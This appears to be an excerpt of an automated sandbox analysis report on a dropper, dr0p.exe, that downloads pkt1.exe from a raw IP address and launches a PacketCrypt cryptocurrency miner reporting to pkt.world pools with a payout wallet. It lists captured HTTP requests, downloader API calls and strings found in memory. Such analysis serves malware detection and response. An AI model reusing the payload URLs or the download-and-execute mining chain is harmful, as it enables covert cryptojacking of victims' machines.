Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244
Source: unknown	TCP traffic detected without corresponding DNS query: 23.27.51.244

Source: C:\Users\user\Desktop\download\dr0p.exe

Code function: 4_2_0042006A InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,exit,

4_2_0042006A

Source: global traffic	HTTP traffic detected: GET /dr0p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: /Accept-Encoding: identityHost: 23.27.51.244Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pkt1.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 23.27.51.244Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_c35fd9c58d17f5a4286cad866742cfe73d2668763e0054987e11c34fd0cc9257.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_f81e5698c5e0fb41dc294b35cd90bc9c14099c600ac3552e458ad81dbe98dc1f.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_b1d23fddeb64724ab01131b49001266f9e54305fb157640997511b44e5ae8d45.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_f15cbf3e28240c865cdcea9a8b070f97314642d186df423efaabdda218fe244a.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_6c268e171cb964ae5d30a3b0a0f6b3fe87fc2050c2be976fbe11095bd476bc2c.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_83162e31509d488170de0c30344abb6fd67ecb0f27a7d1051bdc3e804b41c796.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_4087dcaf89d1ca4fef66e3d92de41a60caae8f691d440ea9391937078046b3fe.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /master/blkinfo_e027044e7dd28af1f3a76a7775c1382625340444344dc037112f7c943e02c5fb.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world
Source: global traffic	HTTP traffic detected: GET /config.json HTTP/1.1accept: /user-agent: packetcrypt_rs 0.6.0x-pc-sid: b6514778294a451dacdbc383cad4d563host: pool.pkt.world

Source: global traffic	DNS traffic detected: DNS query: pool.pkt.world
Source: global traffic	DNS traffic detected: DNS query: any.ah.pkt.world

Source: unknown

HTTP traffic detected: POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5ax-pc-sver: 1x-pc-annver: 1x-pc-worknum: 2836973accept: */*host: any.ah.pkt.worldtransfer-encoding: chunked

Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://.css
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://.jpg
Source: wget.exe, 00000002.00000002.1995575922.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.2
Source: wget.exe, 00000002.00000002.1995575922.0000000000B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/dr0p.exe
Source: wget.exe, 00000002.00000002.1995534130.0000000000B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/dr0p.exe64
Source: wget.exe, 00000002.00000002.1995534130.0000000000B10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/dr0p.exel
Source: wget.exe, 00000002.00000002.1995534130.0000000000B15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/dr0p.exem
Source: dr0p.exe, 00000004.00000002.2353226335.0000000000420000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://23.27.51.244/pkt1.exe
Source: dr0p.exe, 00000004.00000002.2356498947.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.27.51.244/pkt1.exe%
Source: packetcrypt.exe, 00000008.00000003.2748829780.000002451F226000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959945799.000002451F265000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F261000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849033044.000002451F261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world
Source: packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://any.ah.pkt.world/anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad556
Source: System.Private.Xml.dll.6.dr	String found in binary or memory: http://exslt.org/common
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay
Source: packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay(J#
Source: packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/pay5J
Source: packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payRK
Source: packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/paya
Source: packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://master.pkt.world/payl
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.p
Source: packetcrypt.exe, 00000008.00000003.2849144652.000002451F1D1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032077071.000002451F1D5000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032195378.000002451F1DC000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849195427.000002451F1DC000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223221500.000002451F1D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world
Source: packetcrypt.exe, 00000008.00000003.2869330836.000002451C642000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000002.3223583370.000002451F2CE000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit
Source: packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submit?J
Source: packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitn
Source: packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitn4
Source: packetcrypt.exe, 00000008.00000002.3223583370.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/blk/submitnl
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C58C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json
Source: packetcrypt.exe, 00000008.00000003.2555320114.000002451F1FF000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2555529474.000002451F226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json#T4
Source: packetcrypt.exe, 00000008.00000002.3223014589.000002451F0E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.json2ldgukth5a
Source: packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.jsonf
Source: packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/config.jsonpkt.worN
Source: packetcrypt.exe, 00000008.00000003.3032136181.000002451F1B1000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3163198339.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master
Source: packetcrypt.exe, 00000008.00000003.2959391142.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master.json
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C5C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master/blkinfo_4087dcaf89d1ca4fef66e3d92de41a60caae8f691d440ea9391937078046b3f
Source: packetcrypt.exe, 00000008.00000002.3223221500.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2849098159.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749222172.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3031751868.000002451F21C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749266645.000002451F21D000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959832741.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.3164309843.000002451F224000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2959536694.000002451F20C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2749016108.000002451F20C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/master0J
Source: packetcrypt.exe, 00000008.00000003.2841134328.000002451F29C000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2869132042.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterG
Source: packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterN
Source: packetcrypt.exe, 00000008.00000003.2555320114.000002451F248000.00000004.00000020.00020000.00000000.sdmp, packetcrypt.exe, 00000008.00000003.2556530550.000002451F25E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterNum
Source: packetcrypt.exe, 00000008.00000003.2959391142.000002451F2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masterT
Source: packetcrypt.exe, 00000008.00000003.2629587306.000002451F21D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world/masteraK
Source: packetcrypt.exe, 00000008.00000002.3220847412.000002451C900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.world=C:HOMEPATH
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldC:
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldG
Source: packetcrypt.exe, 00000008.00000002.3220847412.000002451C900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worldem
Source: packetcrypt.exe, 00000008.00000002.3220492257.000002451C5A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pool.pkt.worlds
Source: System.Private.Xml.dll.6.dr	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://aka.ms/binaryformatter
Source: pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp, pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000006.00000002.3221181559.0000025675A50000.00000004.00001000.00020000.00000000.sdmp, pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp, System.Private.Xml.dll.6.dr, System.Net.NetworkInformation.dll.6.dr, System.Collections.Specialized.dll.6.dr, System.Net.WebHeaderCollection.dll.6.dr	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/download
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/info
Source: pkt1.exe, 00000006.00000002.3224591101.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp, pkt1.exe, 00000006.00000000.2352463284.00007FF6471ED000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues
Source: pkt1.exe, 00000006.00000002.3221267777.0000025676052000.00000002.00000001.01000000.00000007.sdmp, packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues#
Source: packetcrypt.exe, 00000008.00000000.2411177944.00007FF632E74000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues/home/runner/.cargo/registry/src/index.crates.io-6f17d22bba150
Source: pkt1.exe, 00000006.00000002.3264924713.00007FF8B78A1000.00000020.00000001.01000000.0000000A.sdmp, pkt1.exe, 00000006.00000002.3220861008.0000025674032000.00000002.00000001.01000000.00000010.sdmp, pkt1.exe, 00000006.00000002.3224952852.00007FF8A8A26000.00000020.00000001.01000000.00000006.sdmp, pkt1.exe, 00000006.00000002.3265197772.00007FF8BA4F1000.00000020.00000001.01000000.0000000C.sdmp, pkt1.exe, 00000006.00000002.3264827588.00007FF8B7821000.00000020.00000001.01000000.0000000B.sdmp, pkt1.exe, 00000006.00000002.3220953516.0000025674042000.00000002.00000001.01000000.00000011.sdmp, pkt1.exe, 00000006.00000002.3220795521.0000025674022000.00000002.00000001.01000000.0000000F.sdmp, pkt1.exe, 00000006.00000002.3265112566.00007FF8B9F61000.00000020.00000001.01000000.0000000D.sdmp, pkt1.exe, 00000006.00000002.3222444888.00000256780F0000.00000004.00000020.00020000.00000000.sdmp, pkt1.exe, 00000006.00000002.3265014655.00007FF8B7E01000.00000020.00000001.01000000.00000008.sdmp, pkt1.exe, 00000006.00000002.3265265471.00007FF8BA511000.00000020.00000001.01000000.00000009.sdmp, System.Globalization.Extensions.dll.6.dr, System.Xml.XDocument.dll.6.dr, System.Reflection.Extensions.dll.6.dr, System.Net.Http.Json.dll.6.dr, System.Runtime.Handles.dll.6.dr, System.Private.Xml.dll.6.dr, Microsoft.Win32.Primitives.dll.6.dr, System.Net.NetworkInformation.dll.6.dr, System.Diagnostics.Tools.dll.6.dr, System.Numerics.dll.6.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: System.Private.Xml.dll.6.dr	String found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: System.Runtime.Handles.dll.6.dr	String found in binary or memory: https://github.com/dotnet/runtimeJ
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://github.com/mono/linker/issues/378
Source: pkt1.exe, 00000006.00000002.3224952852.00007FF8A82B1000.00000020.00000001.01000000.00000006.sdmp, System.Private.CoreLib.dll.6.dr	String found in binary or memory: https://github.com/mono/linker/pull/649
